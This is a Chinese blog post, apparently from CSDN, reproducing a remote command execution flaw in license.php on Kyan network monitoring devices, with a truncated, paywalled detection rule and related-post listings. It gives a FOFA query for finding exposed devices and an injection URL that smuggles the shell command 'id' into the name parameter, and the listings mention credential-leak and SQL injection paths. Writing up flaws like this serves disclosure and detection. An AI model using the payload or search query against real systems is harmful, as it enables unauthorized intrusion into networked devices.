Kyan网络监控设备license.php远程命令执行漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-03 15:17:56 修改

阅读量134

点赞数

CC 4.0 BY-SA版权

分类专栏：漏洞复现文章标签：网络 web安全

于 2024-04-03 15:17:43 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_43567873/article/details/137346913

漏洞复现专栏收录该内容

363 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

Kyan网络监控设备的license.php存在一个远程命令执行漏洞，允许未经验证的攻击者通过组合使用特定参数执行任意命令。配合账号密码泄露，攻击者可能获取服务器完全控制权。复现过程包括访问特定URL来触发漏洞，并通过创建文件来验证命令执行。建议用户及时更新官方发布的补丁以修复此安全问题。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Kyan网络监控设备license.php远程命令执行漏洞

漏洞描述
Kyan 网络监控设备 license.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞，可以获取服务器权限，存在远程命令执行漏洞
fofa
app=”Kyan设计”
漏洞复现
登陆后访问/license.php?cmd=delete&name=;id>nnd.txt

然后访问/nnd.txt，查看执行结果

检测poc规则编写

params: []
name: Kyan网络监控设备license.php远程命令执行漏洞
set: 
  filename: randomLowercase(10)
rules:
- met

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

订阅专栏

Kyan网络监控设备time.php远程命令执行漏洞

weixin_43567873的博客

03-11

128

Kyan网络监控设备time.php远程命令执行漏洞

漏洞复现|Kyan密码泄露/命令执行漏洞

失心少年

06-29

930

Kyan网络监控设备存在账号密码泄露漏洞，该漏洞是由于开发人员将记录账户密码的文件放到网站目录，攻击者可通过访问目录获取Kyan网络监控设备账号密码，进入控制后台。该系统存在密码泄露及多个远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。

参与评论您还未登录，请先登录后发表或查看评论

有了这个网络安全面试题，面试就像开了挂！（附PDF）

lvaolan的博客

02-26

1704

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！内容实在太多，不一一截图了。

2401_84300128的博客

05-01

225

📢📢为了操作简便，在这里我就不使用数据库，

Kyan网络监控设备hosts账号密码泄露漏洞（含批量验证poc）

weixin_43567873的博客

04-03

234

Kyan网络监控设备hosts账号密码泄露漏洞（含批量验证poc）

Kyan网络监控设备run.php远程命令执行漏洞（含批量验证poc）

weixin_43567873的博客

04-03

118

Kyan网络监控设备run.php远程命令执行漏洞（含批量验证poc）

Kyan网络监控设备module.php远程命令执行漏洞（含批量验证poc）

weixin_43567873的博客

04-03

104

Kyan网络监控设备module.php远程命令执行漏洞（含批量验证poc）

Kyan 网络监控设备 hosts 账号密码泄露漏洞

孤桜懶契

04-05

1283

漏洞描述 Kyan 网络监控设备存在账号密码泄露漏洞，攻击者通过漏洞可以获得账号密码和后台权限漏洞影响 s ✅Kyan 空间测绘 d ⭕title="platform - Login" 漏洞复现 ✅登陆页面如下漏洞url http://127.0.0.1/hosts 个人博客孤桜懶契：https://gylq.gitee.io/time ...

Kyan网络监控设备run，2024年最新网络安全开发面试准备

2401_83620959的博客

04-17

356

【代码】Kyan网络监控设备run，2024年最新网络安全开发面试准备。

滑动验证

withoutfear的博客

10-01

532

CSS代码 <style> .lys_drag { width: 200px; height: 30px; line-height: 30px; background-color: #e8e8e8; position: relative; margin: 0 auto; } .lys_bg {

Kyan网络监控设备账号密码泄露漏洞

chaojixiaojingang

04-19

2031

1.漏洞描述 Kyan网络监控设备存在账号密码泄露漏洞，该漏洞是由于开发人员将记录账户密码的文件放到网站目录，攻击者可通过访问目录获取Kyan网络监控设备账号密码，进入控制后台。 2.网络资产查找 Fofa：title="platform - Login" 3.POC http://xxx.xxx.xxx.xxx/hosts 4.漏洞复现 1）访问Kyan网络监控设备登录页面 2）访问POC，获取账号密码 3）利用获取的账号密码可直接进入后台 ...

我的Arch永远在安装(一:基本系统)

Kyan Chang的博客

12-17

2167

intel的CPU和N卡笔记本安装Archlinux的一般步骤

PHP 远程命令执行漏洞（CVE-2018-19518）

qq_46501419的博客

03-21

1054

CVE-2018-19518详细信息影响范围复现过程详细信息在PHP和其他产品的imap_open（）中使用的UNIX上的华盛顿大学IMAP工具包2007f启动rsh命令（借助于c-client / imap4r1.c中的imap_rimap函数和osdep / unix / tcp_unix中的tcp_aopen函数.c），而不会阻止参数注入，如果IMAP服务器名称是不受信任的输入（例如，由Web应用程序的用户输入），并且rsh已被具有不同参数的程序替换，则远程攻击者可能会执行任意OS命令语义。例如

命令执行php框架代码,ThinkPHP远程命令执行漏洞原理及复现

weixin_42388716的博客

03-09

354

2018年12月11日，exploit-db更新了一个thinkphp框架远程代码执行漏洞exploit地址：https://www.exploit-db.com/exploits/45978由于框架对控制器名没有进行足够的检测导致在没有开启强制路由的情况下getshell漏洞影响范围Thinkphp 5.1.0 - 5.1.31Thinkphp 5.0.5 - 5.0.23安装：下载地址http...

2021年网络安全设备漏洞集合

weixin_47536169的博客

07-13

3974

360天擎SQL注入漏洞描述 fofa title="360新天擎" POC & 利用 /api/dp/rptsvcsyncpoint?ccid=1 360天擎信息泄露描述 /api/dbstat/gettablessize POC & 利用 Alibaba 阿里巴巴Nacos认证绕过描述 fofa：title="Nacos" POC & EXP # 添加用户 POST /nacos/v1/auth/users HTTP/1.1 ..

HCIP笔记（第四章）

panshiyangmaye的博客

08-03

992

描述区域内的MA网络（广播网络、NBMA网络）链路的路由器及掩码信息仅在区域内部传输只有DR才会产生type2_LSA[R1]dis ospf lsdb network 查看Type2 LSA的具体信息Summary LSA(聚合LSA)在整个OSPF区域内，描述其他区域的链路信息以子网形式传播，类似直接传递路由只有ABR会产生type3_LSA[R1]dis ospf lsdb summary 查看Type3 LSA的具体信息描述ASBR的信息只有ABR才会产生TYPE4 LSA。

TCP协议与UDP协议